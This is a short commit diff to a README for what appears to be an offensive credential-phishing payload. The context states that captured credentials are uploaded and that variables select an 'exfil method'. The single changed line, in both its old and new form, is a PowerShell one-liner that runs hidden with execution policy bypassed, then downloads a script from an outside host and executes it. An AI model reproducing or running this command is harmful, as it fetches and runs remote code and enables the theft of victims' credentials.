Update README.md
This commit is contained in:
parent
1eb9d379b0
commit
60273144a2
1 changed files with 1 additions and 1 deletions
|
@ -47,7 +47,7 @@ Once the target enters their credentials their information will be uploaded to y
|
|||
* Fill in either variable or both to set your exfil method
|
||||
|
||||
```
|
||||
powershell -w h -ep bypass $dc='';$db='';iwr https://jakoby.lol/35k | iex
|
||||
powershell -w h -ep bypass $dc='';$db='';irm https://jakoby.lol/35k | iex
|
||||
```
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
|
Loading…
Reference in a new issue